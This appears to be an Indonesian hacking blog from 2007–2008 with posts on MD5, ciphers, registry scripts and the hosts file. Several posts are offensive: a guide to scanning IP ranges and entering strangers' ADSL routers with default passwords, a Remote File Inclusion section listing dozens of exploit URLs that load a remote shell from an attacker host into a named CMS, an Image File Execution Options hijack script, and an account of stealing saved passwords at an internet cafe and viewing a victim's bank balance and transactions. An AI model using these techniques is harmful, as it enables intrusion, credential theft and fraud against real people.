p_ProcessPath = ProcessPath(p_ProcessID)

If Not m_SystemProcess Then
If p_ProcessPath = "SYSTEM" Then
GoTo Next_Process 'System processes not included. Get next process instead.
End If
End If

m_ProcessID = p_ProcessID
m_NumProcesses = m_NumProcesses + 1

p_Terminate = False
RaiseEvent CurrentProcess((p_ProcessName), (p_ProcessPath), (p_ProcessID), p_Terminate)
If p_Terminate Then
Call TerminateProcess(p_ProcessID)
End If
Next_Process:
p_ProcessEntry.szExeFile = String(MAX_PATH, 0)
p_Process = Process32Next(p_Snapshot, p_ProcessEntry)
Loop
End If
End Sub

'Private Functions
Private Function ProcessPath(ByVal ID As Long) As String
If m_Cancel Then
Exit Function 'Abort the whole scanning process
End If

Dim p_Process As Long
p_Process = OpenProcess(PROCESS_QUERY_INFORMATION Or PROCESS_VM_READ, 0&, ID)

If Not p_Process = 0 Then
Dim p_Modules(1 To 200) As Long
Dim p_Needed As Long
Dim p_Ret As Long

p_Ret = EnumProcessModules(p_Process, p_Modules(1), 200, p_Needed)

If Not p_Ret = 0 Then
Dim p_ModuleName As String * MAX_PATH
Dim p_Size As Long

p_Size = 500
p_Ret = GetModuleFileNameEx(p_Process, p_Modules(1), p_ModuleName, p_Size)

ProcessPath = Left$(p_ModuleName, p_Ret)

ProcessPath = Replace$(ProcessPath, "\??\", Empty)
ProcessPath = Replace$(ProcessPath, "\SystemRoot\", WindowsDirectory & "\")

m_FullPathName = ProcessPath 'Save full path with filename

ProcessPath = Left$(ProcessPath, InStrRev(ProcessPath, "\")) 'Return without the filename
End If

p_Ret = CloseHandle(p_Process)
End If

If ProcessPath = Empty Then
ProcessPath = "THIS IS A SYSTEM PROCESS"
End If
End Function

'Private Properties
Private Property Get WindowsDirectory()
Dim p_Buffer As String * MAX_PATH
Dim p_NullPos As Integer

If Not GetWindowsDirectory(p_Buffer, MAX_PATH) = 0 Then
p_NullPos = InStr(1, p_Buffer, vbNullChar)

WindowsDirectory = Left(p_Buffer, p_NullPos - 1)
End If
End Property

'Class Procedures
Private Sub Class_Initialize()
m_FullPathName = Empty
m_ProcessID = -1
m_SystemProcess = False
End Sub

Atau anda bisa men-download source code lengkap aplikasi ini di http://yadoy666.freehostia.com/stupid_source.zip

Sekian dulu dari saya, semoga berguna bagi anda...

Berkenalan dengan MD5

2008-01-10T15:58:00.001+07:00

MD5 (Message Digest algorithm 5)ialah fungsi hash kriptografik yang digunakan secara luas dengan hash value 128-bit. Pada standart Internet (RFC 1321), MD5 telah dimanfaatkan secara bermacam-macam pada aplikasi keamanan, dan MD5 juga umum digunkan untuk melakukan pengujian integritas sebuah file. MD5 di desain oleh Ronald Rivest pada tahun 1991 untuk menggantikan hash function sebelumnya yaitu MD4.

MD5 banyak digunakan oleh CMS-CMS besar seperti Joomla dan Mambo untuk melakukan enkripsi password.

Pseudocode
//Catatan: Seluruh variable tidak pada 32-bit dan dan wrap modulo 2^32 saat melakukan perhitungan

//Mendefinisikan r sebagai berikut
var int[64] r, k
r[ 0..15] := {7, 12, 17, 22, 7, 12, 17, 22, 7, 12, 17, 22, 7, 12, 17, 22}
r[16..31] := {5, 9, 14, 20, 5, 9, 14, 20, 5, 9, 14, 20, 5, 9, 14, 20}
r[32..47] := {4, 11, 16, 23, 4, 11, 16, 23, 4, 11, 16, 23, 4, 11, 16, 23}
r[48..63] := {6, 10, 15, 21, 6, 10, 15, 21, 6, 10, 15, 21, 6, 10, 15, 21}

//Menggunakan bagian fraksional biner dari integral sinus sebagai konstanta:
for i from 0 to 63
k[i] := floor(abs(sin(i + 1)) × 2^32)

//Inisialisasi variabel:
var int h0 := 0x67452301
var int h1 := 0xEFCDAB89
var int h2 := 0x98BADCFE
var int h3 := 0x10325476

//Pemrosesan awal:
append "1" bit to message
append "0" bits until message length in bits ≡ 448 (mod 512)
append bit length of message as 64-bit little-endian integer to message

//Pengolahan pesan paada kondisi gumpalan 512-bit:
for each 512-bit chunk of message
break chunk into sixteen 32-bit little-endian words w(i), 0 ≤ i ≤ 15

//Inisialisasi nilai hash pada gumpalan ini:
var int a := h0
var int b := h1
var int c := h2
var int d := h3

//Kalang utama:
for i from 0 to 63
if 0 ≤ i ≤ 15 then
f := (b and c) or ((not b) and d)
g := i
else if 16 ≤ i ≤ 31
f := (d and b) or ((not d) and c)
g := (5×i + 1) mod 16
else if 32 ≤ i ≤ 47
f := b xor c xor d
g := (3×i + 5) mod 16
else if 48 ≤ i ≤ 63
f := c xor (b or (not d))
g := (7×i) mod 16

temp := d
d := c
c := b
b := ((a + f + k(i) + w(g)) leftrotate r(i)) + b
a := temp

//Tambahkan hash dari gumpalan sebagai hasil:
h0 := h0 + a
h1 := h1 + b
h2 := h2 + c
h3 := h3 + d

var int digest := h0 append h1 append h2 append h3 //(diwujudkan dalam little-endian)

MD5 Hash
Hash-hash MD5 sepanjang 128-bit (16-byte), yang dikenal juga sebagai ringkasan pesan, secara tipikal ditampilkan dalam bilangan heksadesimal 32-digit. Berikut ini merupakan contoh pesan ASCII sepanjang 43-byte sebagai masukan dan hash MD5 terkait:

MD5("The quick brown fox jumps over the lazy dog") = 9e107d9d372bb6826bd81d3542a419d6

Bahkan perubahan yang kecil pada pesan akan (dengan probabilitas lebih) menghasilkan hash yang benar-benar berbeda, misalnya pada kata "dog", huruf d diganti menjadi c:

MD5("The quick brown fox jumps over the lazy cog") = 1055d3e698d289f2af8663725127bd4b

Berikut penulis berikan sebuha online tolls milik n0c0py yang berguna untuk melakukan enkripsi dari sebuah plain text menjadi Md5 Hash. Tolls tersebut bisa anda dapatkan pada alamat dibawah ini:

http://n0c0py.uni.cc/tools/md5gen.php

Sedangkan untuk melakukan cracking MD5 Hash, anda bisa menggunakan program-program komputer yang bisa mengubah MD5 Hash menjadi plain text. Contoh program-program tersebut salahsatunya adalah Cain & Able. Selain itu ada beberapa website yang juga menyediakan fasilitas untuk melakukan cracking MD5 Hash. Website-website tersebut antara lain adalah

http://passcracking.com/
http://milw0rm.com/cracker/insert.php

Dan masih banyak lagi....

Special Thanx's for n0c0py
Referensi : Wikipedia

Selamat tahun baru 2008

2008-01-01T13:50:00.000+07:00

Selamat tahun baru 2008. Semoga ditahun yang baru ini kita bisa menjadi manusia yang lebih baik dari tahun-tahun sebelumnya

ADFGVXZ Cipher

2007-12-22T13:33:00.002+07:00

ADFGVXZ merupakan sebuah chiper yang dipergunakan tentara jerman pada perang dunia kedua dan berhasil di pecahkan oleh seorang berkebangsaan perancis. ADFGVXZ enkripsinya berdasarkan sebuah tabel, pertama buat tabelnya dengan huruf A D F G V X Z di sisi atas dan di sisi samping kiri, kemudian masukkan base Aplhabetnya, jadinya seperti ini:

A D F G V X Z
A a b c d e f g
D h i j k l m n
F o p q r s t u
G v w x y z 0 1
V 2 3 4 5 6 7 8
X 9 . , ? ! <
Z > + = * : ; $

Dari tabel dapat di baca kalo a jika dienkripsi menjadi AA, b jika dienkripsi menjadi AD, c jika dienkripsi menjadi AF dan seterusnya.

Berikut penulis berikan implementasi ADFGVXZ chiper dalam sebuah program komputer. Selamat menikmati ^_^

http://yadoy666.110mb.com/tolls/ADFGVX_Cracker.html

nb: sebuah situs simulasi hacking pada soal cryptographi nya menggunakan chiper ini

Masuk ke Router Modem ADSL milik orang lain

2007-12-22T13:32:00.003+07:00

PENTING
--------
Tulisan ini hanya untuk proses pembelajaran saja. Penulis tidak bertanggung jawab atas segala tindakan yang disebabkan oleh tulisan ini

Oke.. langsung aja kita bahas

Pertama-tama cari kita tau IP kita (IP-Public). Untuk mengetahui IP yang kita gunakan kita bisa browsing ke situs www.dnsstuff.com atau situs apa saja yang dapat menampilkan alamat IP pengunjungnya.

Anggap IP penulis adalah 125.161.196.25

Lalu langkah selanjutnya adalah tetapkan range IP contoh IP milik penulis adalah 12.161.192.25 maka kita bisa menetapkan range IP antara 125.161.196.1 sampai 125.161.196.255.

Lalu lakukan scanning menggunakan Angry IP atau tools apa saja yang dapat digunakan untuk melakukan scanning. Lalu scan IP tersebut

Nah.. banyak kan yang aktif... ^_^

Langkah selanjutnya coba masuk kesalah satu IP yang aktif tersebut dengan menggunakan browser. Pada address bar masukan IP yang ingin kita bobol passwordnya. Penulis mendapatkan 35 Router Modem ADSL yang masih menggunakan password default. Berikut penulis berikan password default yang biasa digunakan

admin:admin
admin:[blank]
admin:password
[blank]:[blank]

Biasanya user name dan password account yang didapat dari ISP disembunyikan dengan karakter bintang [*]. Untuk melihat password yang tersembunyi terebut cukup dengan menggunakan View Source pada browser.

Cracking MD5 dengan menggunakan Google

2007-12-22T13:32:00.001+07:00

Beberapa waktu yang lalu saya membaca sebuah artikel yang menjelaskan bahwa Google bisa dijadikan sebuah tolls untuk cracking password yang di enkrip dengan menggunakan MD5. Pertama-tama saya tidak percaya dengan artikel tersebut, kemudian saya melakukan sebuah percobaan untuk membuktikannya. Yang pertama saya lakukan adalah melakukan encode sebuah kata admin dengan menggunakan MD5 yang hasilnya adalah 21232f297a57a5a743894a0e4a801fc3. Kemudian saya paste hash tersebut ke Google dan hasilnya pun sangat mengejutkan.

Ternyata hanya dengan menggunakan Google sebuah hash MD5 dapat di crack dengan mudah... ^_^

Mengakses Registry bertipe Dword dengan VBS

2007-12-22T13:31:00.000+07:00

Beberapa waktu yang lalu rekan penulis yang berasal dari komunitas YogyaFree bertanya kepada saya, "Mas, gemana sih caranya membuat dan menghapus key pada registry yang memiliki tipe data DWORD menggunakan VbScript?". Sebuah pertanyaan yang bagus menurut penulis, karena sebagian besar tutorial yang ada hanya untuk mengatur tipe data STRING. Dengan rasa penasaran yang cukup tinggi, penulis mulai mengutak-atik notepad. dan dalam waktu yang lumayan lama akhirnya penulis dapat menemukan solusinya. Kurang lebih kodenya seperti dibawah ini

------------------- [ Start Copy Here ] ------------------------
dim yadoy666
masuk()
sub masuk()
set yadoy666 = wscript.CreateObject("wscript.shell")
keterangan = "Pilihan:" & vbcrlf &_
"[0].Aktifkan Run." & vbcrlf &_
"[1].Nonaktifkan Run." & vbcrlf & vbcrlf &_
"[YaDoY SoFtWarE DeVeLoPmEnT]"

nilai = inputbox(keterangan,"Edit Run",0)

yadoy666.RegWrite
"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer\NoRun",nilai,"REG_DWORD"

if nilai=1 then
msgbox "Run dinonaktifkan",vbInformation,"Edit Run"
else
if nilai=0 then
msgbox "Run diaktifkan",vbInformation,"Edit Run"

yadoy666.RegDelete
"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer\NoRun"

else
msgbox "Masukkan angka 0 atau 1!",vbInformation,"Edit Run"
masuk()
end if
end if

end sub

------------ [ Stop Copy Here ] ------------------------

Mudah-mudahan kode diatas dapat membantu.
For Shadow Angel Greet Question... Keep Coding ^_^

Mengamankan Control Panel anda

2007-12-22T13:30:00.000+07:00

Pertama tama anda harus memiliki account administrator bukan limited user. Lalu copy pastekan script dibawah ini ke notepad. Lalu save denga nama "Cpanel.js" (tanpa tanda kutip).

----------------[ Start Copy Here ]--------------------

// Program Sederhana Mengamankan Control Panel
var vbCancel = 2;
var vbYesNoCancel = 3;
var vbYes = 6;
var vbNo = 7;
var vbQuestion = 32;
var vbInformation = 64;
var natan = WScript.CreateObject("WScript.Shell");
var pesan1 = "Hentikan Akses Control Panel:\n\n"+
"[Yes] untuk Nonaktifkan Control Panel.\n"+
"[No] untuk Aktifkan Control Panel.\n"+
"[Cancel] untuk Berhenti.\n\n"+
"-> Amankan Control Panel sekarang?"
var tanya = natan.popup(pesan1,0,"Akses Control Panel",vbYesNoCancel+vbQuestion);
if (tanya == vbYes)
{
natan.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion"+
"\\Policies\\Explorer\\NoControlPanel",1,"REG_DWORD");
pesan2 = "Control Panel Dinonaktifkan!"
natan.popup(pesan2,0,"Akses Control Panel",vbInformation);
}
else if (tanya == vbNo)
{
natan.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion"+
"\\Policies\\Explorer\\NoControlPanel",0,"REG_DWORD");
pesan3 = "Control Panel Diaktifkan!"
natan.popup(pesan3,0,"Akses Control Panel",vbInformation);
}
else
{
natan.popup("Terima Kasih",0,"YaDoY SoFtWaRe DeVeLoPmEnT",vbInformation);
}

-------------[ Stop Copy Here ]-------------------

Klik dua kali pada ikon file tersebut untuk menjalankannya. Jika Anda menggunakan Macromedia Dreamweaver tentunya gambar ikon dari program tersebut akan berubah menjadi ikon Macromedia Dreamweaver dan pastinya jika Anda klik dua kali ikon tersebut maka yang keluar yaitu jendela Macromedia Dreamweaver.

Oleh karena itu untuk menjalankannya harus melalui Command Prompt. Caranya yaitu buka Command Prompt lalu masuk ke direktori dimana Anda menempatkan program yang telah Anda buat (misal: C:\). Kemudian ketikkan perintah cscript Cpanel.js (contoh: C:\cscript Cpanel.js) pada prompt untuk menjalankan program.

Remote File Inclusion

2007-12-22T13:27:00.000+07:00

Mungkin bagi sebagian teman-teman bertanya-tanya apa sih Remote File Inclusion itu? Bagi sebagian teman-teman yang biasa bergelut dengan komputer security pasti telah sering mendengar apa yang disebut dengan Remote File Inclusion atau biasa disingkat dengan RFI. Remote File Inclusion adalah sebuah bentuk serangan secara remote yang memanfaatkan kelemahan script pada suatu halaman website karena tidak tersanitasi dengan baik, dengan cara menyisipkan script lain untuk exploitasi,

Tehnik ini sendiri mengharuskan webserver yang bersangkutan mampu menjalankan server side scripting (PHP, ASP, etc) serta file yang disisipi dibuat menggunakan bahasa script tersebut. Target remote file inclusion biasanya berbentuk sebuah portal atau content management system (CMS) sehingga banyak sekali jumlah website yang rawan terhadap serangan tipe ini.

MENGAPA BISA TERJADI?
----------------------
Sebuah serangan Remote File Inclusion terjadi berdasarkan pada kesalahan atau ketidaksengajaan pendeklarasian variabel-variabel dalam sebuah file. Sebuah variabel yang tidak dideklarasikan atau didefinisikan secara benar dapat di eksploitasi. Syarat terjadinya injeksi sendiri terdiri dari:

1. Variabel yang tidak dideklarasikan dengan benar (unsanitized variables)

Variabel dalam PHP mempunyai sintaks:

include ($namavariable. “/file…”)
require_once ($namavariable. /file…)
include_once ($variable. /file…)

Misalnya kita memiliki sebuah file bernama jscript.php dan didalamnya terdapat variabel
seperti ini:

…
include($my_ms[”root”].’/error.php’);
…

Variabel tersebut memiliki kemungkinan untuk disisipi file dari luar webserver dengan eksploit
script PHP Incetion:

http://www.target.com/[Script
Path]/jscript.php?my_ms[root]=http://www.injek-pake-kaki.com/script?

2. Setting dalam file PHP.ini

register_globals=On
magic_quotes=off
allow_fopenurl=on

CONTOH SERANGAN DENGAN MENGGUNAKAN TEKNIK RFI
---------------------------------------------
Pada kesempatan kali ini penulis akan memberikan sebuah contoh penyerangan dengan menggunakan teknik Remote File Inclusion. Yang akan penulis jadikan target pada contoh kali ini adalah IAPR COMMENCE Versi 1.3. Pada IAPR COMMENCE Versi 1.3 ini banyak sekali halaman yang tidak terfilter dengan baik sehingga bisa dimanfaatkan oleh penyerang untuk melakukan serangan dengan menggunakan teknik Multiple Remote File Inclusion. Halaman-halaman beserta exploitasinya sebagai berikut :

http://target.com/Commence/includes/
db_connect.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/includes/
include_all_fns.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/includes/
main_fns.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/includes/
output_fns.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/includes/
user_authen_fns.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/admin/includes/
include_all_fns.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/admin/phase/
include_all_phase.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/admin/phase/
phase1.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/admin/phase/
phase1.php?privilege_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/admin/phase/
phase2.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/admin/phase/
phase2.php?privilege_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/admin/phase/
phase3.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/admin/phase/
phase3.php?privilege_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/admin/phase/
phase4.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/admin/phase/
phase4.php?privilege_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/admin/phase/
phasebase.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/includes/page_includes/
page.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/includes/page_includes/
pagebase.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/reviewer/includes/
include_all_fns.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/reviewer/phase/
include_all_phase.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/includes/page_includes/
pagebase.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/reviewer/phase/
phase1.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/reviewer/phase/
phase1.php?privilege_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/reviewer/phase/
phase2.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/reviewer/phase/
phase2.php?privilege_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/reviewer/phase/
phase3.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/reviewer/phase/
phase3.php?privilege_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/reviewer/phase/
phase4.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/reviewer/phase/
phase4.php?privilege_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/reviewer/phase/
phasebase.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/user/phase/
include_all_phase.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/user/phase/
phase1.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/user/phase/
phase2.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/user/phase/
phase3.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/user/phase/
phase4.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/user/phase/
phasebase.php?php_root_path=http://penyerang.com/shell.txt?

TINGKAT BAHAYA
--------------
Serangan Remote File inclusion memiliki level resiko tinggi (High Risk) bahkan level sangat berbahaya (Very Dangerous) karena injeksi memperkenankan pelakunya untuk melakukan eksekusi perintah jarak jauh (Remote Commands Execution) terhadap server. Tindakan ini sangat membahayakan bagi sebuah server jika pelakunya mencoba untuk mendapatkan hak akses lebih tinggi dengan cara melakukan eksploitasi lokal, sehingga bisa saja pelaku mendapatkan akses administrator atau root.

APA YANG HARUS DILAKUKAN
-------------------------
Banyak sekali portal dan komunitas white hat yang sering merilis bugs terbaru seputar injeksi. Cara paling aman adalah selalu memperhatikan perkembangan yang mereka lakukan sehingga anda dapat melakukan sedikit perbaikan yang berarti terhadap CMS yang mungkin sekarang anda gunakan. Selalu perhatikan raw log yang biasanya terdapat pada layanan hosting anda. Jika terdapat fetching yang agak menyimpang seperti GET /index.php?page=http://www.injek-pake-kaki.net/cmd? anda wajib curiga, karena bisa saja ini serangan terhadap web atau portal yang anda kelola.Salah satu tehnik paling aman bagi seorang administrator adalah selalu memperhatikan usaha-usaha infiltrasi dan usaha eksploitasi lokal.

Artikel diatas penulis tulis berdasarkan pengetahuna yang penulis miliki, apabila terdapat kesalahan dimohon masukan dan pencerahannya.

Referensi:
http://www.milw0rm.com
http://newbie.banget.or.id/

All about File Host

2007-12-22T13:26:00.002+07:00

File Host merupakan file bawaan sistem operasi Windows. File ini berguna untuk mengalihkan koneksi ke suatu situs menuju situs lain. Misalnya untuk mencegah user mengakses situs www.17tahun.com maka cukup dengan menambahkan baris ini:
127.0.0.1 www.17tahun.com
setelah itu save. Maka ketika user mencoba untuk mengakses situs www.17tahun.com maka halaman akan di redirect ke 127.0.0.1.

Lokasi file Host:
- Win 9x dan ME berada di c:\windows\
- Win NT berada di c:\winnt\system32\driverrs\etc\
- Win XP berada di c:\windows\system32\drivver\etc\

File ini tidak memiliki ekstensi namun tetap masih bisa dibuka dengan Notepad maupun Wordpad. Dalam pengeditan file ini pastikan setelah alamat IP terdapat minimal satu spasi. Ada beberapa malware yang menyalahgunakan file ini untuk melakukan pencegahan update sebuah antivirus. Contoh malware tersebut adalah Virus Wayang. Virus ini melakukan modifikasi file host dan melakukan pemblokiran beberapa situs dengan menggunakan file ini. Berikut isi file host yang telah dirubah oleh virus Wayang

------------------------------------------------------------

127.0.0.1 localhost
# Host file has been infected by: W32.Wayang
# Powered by Majnun

127.0.0.1 www.vaksin.com
127.0.0.1 vaksin.com
127.0.0.1 www.ansav.com
127.0.0.1 ansav.com
127.0.0.1 www.jasakom.com
127.0.0.1 jasakom.com
127.0.0.1 www.vbbego.com
127.0.0.1 vbbego.com
127.0.0.1 www.virologi.info
127.0.0.1 virologi.info
127.0.0.1 www.infokomputer.com
127.0.0.1 infokomputer.com
127.0.0.1 www.kaskus.com
127.0.0.1 kaskus.com
127.0.0.1 www.duniasex.com
127.0.0.1 duniasex.com
127.0.0.1 www.sysinternals.com
127.0.0.1 sysinternals.com
127.0.0.1 www.avast.com
127.0.0.1 avast.com
127.0.0.1 www.mcafee.com
127.0.0.1 mcafee.com
127.0.0.1 www.grisoft.com
127.0.0.1 grisoft.com
127.0.0.1 www.symantec.com
127.0.0.1 symantec.com
127.0.0.1 www.norman.com
127.0.0.1 norman.com
127.0.0.1 www.trendmicro.com
127.0.0.1 trendmicro.com
127.0.0.1 www.secunia.com
127.0.0.1 secunia.com
127.0.0.1 www.zonelabs.com
127.0.0.1 zonelabs.com
127.0.0.1 www.pandasoftware.com
127.0.0.1 pandasoftware.com
127.0.0.1 www.f-secure.com
127.0.0.1 f-secure.com
127.0.0.1 www.sophos.com
127.0.0.1 sophos.com
127.0.0.1 www.free-av.com
127.0.0.1 free-av.com
127.0.0.1 www.neuber.com
127.0.0.1 neuber.com
127.0.0.1 www.bleepingcomputer.com
127.0.0.1 bleepingcomputer.com
127.0.0.1 www.iknowprocess.com
127.0.0.1 iknowprocess.com
127.0.0.1 www.kaspersky.com
127.0.0.1 kaspersky.com
127.0.0.1 www.virustotal.com
127.0.0.1 virustotal.com
127.0.0.1 www.friendster.com
127.0.0.1 friendster.com

# Didik penguasa dengan perlawanan

------------------------------------------------------------

Sebuah ide yang bagus apabila file ini digunakan untuk melakukan pemblokiran terhadap situs-situs porno.

Mengalihkan program dengan menggunakan Image File

2007-12-22T13:26:00.001+07:00

Bingung dengan judul diatas..? Kenapa binggung? Oke biar ga' binggung penulis akan jelaskan maksud dari judul diatas. Yang dimaksud dengan mengalihkan program dari judul diatas adalah mengalihkan suatu program yang di eksekusi oleh user dengan program lain. contoh: apabila kita melakukan eksekusi kepada game freecell maka yang akan terbuka bukan lah freecel melainkan program calculator.

Cara mengalihkan program seperti pada contoh dapat dilakukan dengan mudah dan tanpa menggunakan tolls sama sekali. Cara yang dapat digunakan untuk melakukan hal tersebut adalah dengan memanfaatkan Image File Execution bawaan Windows.

Image File Execution merupakan lokasi registry windows dimana user dapat mengatur suatu program (sebagai contoh frecell) sehingga pada saat program di eksekusi, maka program tersebut akan dialihkan ke program lain. Hal ini jauh lebih menghemat resource dibandingkan dengan menggunakan timer atau looping untuk mencari caption program yang akan dialihkan.

Teknik ini digunakan oleh beberapa malware lokal untuk menjaga dirinya agar tetap eksis di komputer target. Contoh malware yang memanfaatkan teknik ini adalah W32/Lightmoon atau biasa kita kenal dengan nama MoonLight. Virus ini (sebenarnya ukan virus sih, but worm) akan melakukan bypassing terhadap file Msconfig.exe, Regedit.exe, Cmd.exe, dan taskmgr.exe. Jadi apabila user menjalankan file tersebut maka akan dibaypass ke file duplikat virus. Jadi yang akan dijalankan oleh user bukan Msconfig, Regedit, cmd, maupun taskmgr melaikan program virus yang akan dijalankan oleh user. Lalu bagaimanakan cara melakukan pengalihan program dengan teknik ini?

kopi pastekan script dibawah ini kedlaam notepad dan simpan dengan ekstensi *.VBS

============ [ Start Copy Here ] ============

Dim reg
Set reg = CreateObject("WScript.Shell")

If Msgbox ("Bypass program.... Klik Ok untuk mulai", VbOkCancel +vbinformation, "YaDoY SoFtWaRe DeVeLoPmEnT")=VbOk then
reg.RegWrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Freecell.exe\Debugger","calc.exe"
msgbox "sukses", vbinformation + vbokonly, "YaDoY SoFtWarE DeVeLoPmEnT"
End if

============ [ Stop Copy Here ] ============

Lalu jalan kan file tersebut. Apabila file tersebut terbuka dengan notepad maka file tersebut tidak akan berhasil. Untuk itu buka file tersebut dengan menggunakan Wscript.exe yang terletak di C:\Windows\System32

Wew.. skarang coba buka Freecell.... Apakah yang terjadi..?? Ya program Freecell tersebut telah di baypass ke program calculator.. ^_^

Aouto Complete Kemudahan atau kerawanan

2007-12-22T13:24:00.002+07:00

Author : PusHm0v Software Development
Date : 15/9/2006
Contact:
emomelodicfreak@yahoo.com
new_indo_vx3r@yahoo.com

Shoutz : All echo|staff, yogyafree|staff, The Killer Team
Myztx, vaganci, ^family_code^, TOMMY, adhietslank, etc.
#e-c-h-o, #yogyafree, #javahack, #koncek, #canda, #canda-ops @DAL.NET
newbie_hacker@yahoogroups.com, yogyafree@yahoogroups.com
IT_CENTER@yahoogroups.com, ProgrammerVB@yahoogroups.com
virus_baru@yahoogroups.com
VBbego.com, Virology.info, Vbtn.com
IA01 dan 1IA07, Lab MaDas angk. 19 @ Gunadarma University
Dan teman2 serta kerabat2 lain yang tidak bisa disebutkan satu-persatu

Notes : Penulis TIDAK bertanggung jawab atas penggunaan maupun penyalahgunaan dari artikel ini.
Tujuan dibuat artikel HANYA untuk BAHAN PEMBELAJARAN saja.
Semua nama, URL, domain, IP address, username, password dalam artikel ini disamarkan demi
keamanan dan privasi.
Bila pembaca artikel ini menganggap artikel ini menyinggung perasaan, maka Penulis
memohon maaf sebesar-besarnya.

Main#
Adanya fitur AutoComplete ataupun password storage di berbagai macam browser saat ini
merupakan terobosan inovatif, mengingat kemampuan seseorang dalam menghapal. Dengan
fitur ini pula kita dapat mengehemat waktu mengetik dan mengisi kolom username dan password.
Pernahkah anda bermain di suatu kafe internet atau kantor, dan membuka halaman login dari
Email anda mengetik atau menekan 1 huruf depan dari username anda browser saat itu juga langsung
menampilkan pilihan username-username yang sudah pernah diinputkan?? Bila anda memakai komputer
dengan single user mungkin tak masalah, lalu bagaimana bila multiuser?? Ada kemungkinan username
bahkan password anda dapat diambil oleh orang lain.
Berbekal aplikasi password recovery kita dapat mengambil dan membongkar username-password yang
tersimpan ini. Penulis menggunakan Passcape Internet Explorer Password Recovery (www.passcape.com).
Kebetulan Browser di warnet penulis menggunakan Internet Explorer (selanjutnya disingkat menjadi IE saja)
yang fitur AutoComplete sedang menyala.
Install Passcape Internet Explorer Password Recovery (selanjutnya disingkat menjadi PIEPR saja),
lalu pilih metode Recovery yang akan dijalankan :

* AUTOMATIC : akan membuka Password yang tersimpan secara otomatis
* MANUAL : akan membuka Password melalui file ntuser.dat, biasanya di C:\Documents and Settings\%nama_user%
* CONTENT ADVISOR : akan meng-Edit status dan password dari Internet Explorer Content Advisor
* ASTERISKS PASSWORDS : akan membuka "tabir" karakter '*' atau asterik dari kolom password
* MISCELLANEOUS : akan menampilkan macam-macam cookie, cache atau URL yang disimpan oleh IE

Kita akan menggunakan fitur AUTOMATIC untuk membuka password yang tersimpan. Klik Next>> lalu PIEPR akan
menampilkan sejumlah kolom yang berisi keterangan resource IE apa yang dapat dibuka beserta username dan password.

Contoh hasil Recovery PIEPR:

<<>>

Created by Passcape Internet Explorer Password Recovery

IE resource type : IE autocomplete passwords
Resource name : https://ib.bankapajah.co.id/retail/Login.do
User name/Value : xxxxxxx
Password : xxxxxxx

IE resource type : Identity passwords
Resource name : Main Identity
User name/Value :
Password :

PIEPR v1.4.1.170
09-15-2006 10:23:08

Diatas merupakan username dan password dari sebuah session login internet banking di salah satu Bank swasta nasional.
Dapat dibayangkan apa yg terjadi bila kita mempunyai akses untuk melihat, mengubah bahkan mengambil uang dari akun tersebut.
Berikut contoh hasil pemeriksaan saldo dan histori transaksi dari akun tersebut:

NAMA_ORANG_YANG_KENA_TEPU
15 Sep 2006, 12:53:40 HELP

POSISI SALDO

Nomor Transaksi : 0609150069978
Nomor Rekening : xxxxxxxxxxxxx
Jenis Rekening : Tabungan
Tanggal - Jam : 15 September 2006 - 12:53 PM
Posisi Saldo : Rp. 3.352.512,44

HISTORI TRANSAKSI

Nomor Transaksi : 0609150070131
Nomor Rekening : xxxxxxxxxxxxx Rp.
Jenis Rekening : Tabungan
Periode Transaksi : 14 Aug 2006- 15 Sep 2006
Tampilkan Berdasarkan : Tanggal
Urutkan Berdasarkan : Mulai dari yang kecil

Tanggal Keterangan Transaksi Debet Kredit
14/08/2006 VE POS SA
21765315 /0000186584/VAP-SARINAH THA 160.000,00 0,00
14/08/2006 SA ATM PLN PAYM DR
41100046011547100899423
S1AD00FW /6765 /ATM-SPBU P KLP 150.115,00 0,00
14/08/2006 SA ATM PLN PAYM DR
41100046011547100899423
S1AD00FW /6765 /ATM-SPBU P KLP 2.500,00 0,00
15/08/2006 SA ATM Withdrawal
S1AD00FW /7581 /ATM-SPBU P KLP 1.000.000,00 0,00
15/08/2006 INW.CN-SKN CR SA-MCS
CHEVRON INDONESIA COMPANY - 032 0,00 2.234.825,00
15/08/2006 VE POS SA
